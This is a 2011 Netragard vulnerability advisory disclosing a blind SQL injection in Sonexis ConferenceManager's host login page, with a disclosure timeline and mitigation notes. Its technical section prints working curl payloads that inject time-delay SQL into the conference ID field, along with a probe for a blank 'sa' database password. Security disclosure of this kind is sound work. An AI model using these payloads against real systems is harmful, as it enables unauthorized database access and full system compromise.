*************************** NETRAGARD ADVISORY ************************
                  http://www.netragard.com
                  Research Driven Penetration Testing

[POSTING NOTICE]
--------------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com

[Advisory Information]
--------------------------------------------------------------------------
Contact        : Adriel T. Desautels
Advisory ID      : NETRAGARD-20110910 (Corrected)
Researcher      : Kevin Finisterre & Team
Product Name      : Sonexis ConferenceManager
Product Version      : 9.3.14.0 (Tested On)
Vendor Name      : Sonexix Technology, Inc.
Type of Vulnerability    : Blind SQL Injection 
Impact        : Critical
Date Discovered            : 01/19/2011
Vendor Notified      : 01/26/2011

[Notes About This Advisory]
--------------------------------------------------------------------------
Netragard's team discovered and exploited this vulnerability on January 
19th 2011 during the delivery of research based penetration testing services.
Netragard notified the vendor about this vulnerability on January 26th 2011. 
Netragard did not receive any communications back from Sonexis after initial
notification. 

According to an advisory published by Solutionary, Solutionary discovered
this same vulnerability on 01/27/2011. Solutionary notified Sonexis 
of the vulnerability on 02/18/2011 and received a vendor response back on
03/02/2011. Solutionary published a low detail advisory for this issue on
04/06/2011.

It is Netragard's policy to refrain from publishing vulnerabilities
until after methods for remediation have been created/provided. Exceptions
to this policy are made in the event that vendors are non-responsive or in
the event that the vulnerability becomes public knowledge. 


[Product Description]
--------------------------------------------------------------------------
"The Sonexis ConferenceManager offers unbeatable value. Our high-quality 
audio platform is recognized for its ease-of-use, security, and 
cost-effectiveness — and it offers a comprehensive set of integrated Web
conferencing capabilities. Better still, our unique architecture allows you
unlimited flexibility. You're never more than a license key away from 
increasing users, adding Web functionality, or changing from one protocol
to another. Simply put, it's the best thing to happen to conferencing."

Taken From:
http://www.sonexis.com/products/product_details.asp

[Technical Summary]
--------------------------------------------------------------------------
The Sonexis ConferenceManager does not adhere to best practices as defined
by the Open Web Application Security Project (OWASP), the de facto standard 
for Web Application Security. Specifically, the Sonexis ConferenceManager 
fails the OWASP Data Validation Criterion as well as others that are not
discussed in this advisory.

This advisory discloses details about a Blind SQL Injection vulnerability
that was discovered by Netragard during the delivery of research driven 
penetration testing services.  Successful exploitation of this
vulnerability enables the attacker to take full control of the affected
system. Netragard has created and will provide Proof of Concept code for
this vulnerability shortly after the publication of this Advisory.

Netragard has not received any information from the vendor since initial 
notification. As of the time of the authoring of this Advisory no official
vendor patches have been made public. Netragard has provided methods for 
mitigation in this advisory.

For more information about OWASP criterion please visit the URL Below: 

--> https://www.owasp.org/index.php/Category:Vulnerability <--

[Technical Details]
--------------------------------------------------------------------------
The tests shown below can be used to determine if your Sonexis 
ConferenceManager is vulnerable.

Test Environment:
-----------------
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000


--- TEST 1 ---
Validated SQL command execution with the "wait+for+delay+'0:0:3'--" SQL
command. If command execution is a success then time should return a 
"real" value of roughly 3 seconds. 

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:3'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real    0m3.281s <--- Command Execution Successful!
user    0m0.000s
sys     0m0.004s
--- END TEST 1 ---


--- TEST 2 ---
Validated SQL command execution with the "wait+for+delay+'0:0:5'--" SQL
command. If command execution is a success then time should return a 
"real" value of roughly 5 seconds. 

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:5'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real    0m5.277s <--- Command Execution Successful!
user    0m0.001s
sys     0m0.003s
--- END TEST 2 ---


--- TEST 3 ---
Validated SQL command execution with the "waitfor+delay+'0:0:10'--" SQL
command. If command execution is a success then time should return a 
"real" value of roughly 10 seconds. 

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:10'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real    0m10.280s <--- Command Execution Successful!
user    0m0.002s
sys     0m0.004s
--- END TEST 3 ---


--- TEST 4 ---
This test is an example of how to check for a blank "sa" password in the 
MsSQL Database. If the password is set then there will be no delay in
server response.  If the password is not set, then there will be a 10
second delay. 

netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--" 
"http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real    0m0.305s  <-- Password is set (no delay). 
user    0m0.003s
sys     0m0.001s

netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--" 
"http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real    0m10.101s  <-- Password is not set (delay). 
user    0m0.002s
sys     0m0.003s
--- END TEST 4 ---

[Impact]
--------------------------------------------------------------------------
Exploitation Difficulty  : Trivial
Risk                     : Complete System Compromise, Distributed 
                           Metastasis, Access To Sensitive Data, etc.


[Proof Of Concept]
--------------------------------------------------------------------------
Netragard created a Proof of Concept exploit for this vulnerability that
will be published on Netragard's website shortly after the release of 
this advisory. 


[Vendor Status and Chronology]
--------------------------------------------------------------------------

01/19/2011  - Vulnerability Discovered and Exploited by Netragard, LLC.
01/26/2011  - Vendor Notified of the Vulnerability by Netragard, LLC.
01/27/2011  - Vulnerability Discovered by Solutionary.
02/18/2011  - Vendor Notified of the Vulnerability by Solutionary.
03/02/2011  - Vendor Responds to Solutionary.
04/06/2011  - Solutionary publishes a low detail advisory with no mitigation.
04/10/2011  - Netragard publishes high detail advisory with mitigation.

 
[Mitigation]
--------------------------------------------------------------------------
This vulnerability can be mitigated by filtering application requests with
a Web Application Firewall.  

Further mitigation can be accomplished with custom filtering done through the
Web Server configuration. 

Note: Mitigation does not constitute a proper fix. If an attacker is able 
to circumvent mitigation techniques then exploitation is still possible.
An example of Web Application Firewall subversion can be found at the 
following URL: http://pentest.netragard.com/?p=10


[Solution]
--------------------------------------------------------------------------
Vendor must perform a review of the Sonexis ConferenceManager source code
and ensure that it adheres to the OWASP criterion. 


[Disclaimer]
------------------------http://www.netragard.com--------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.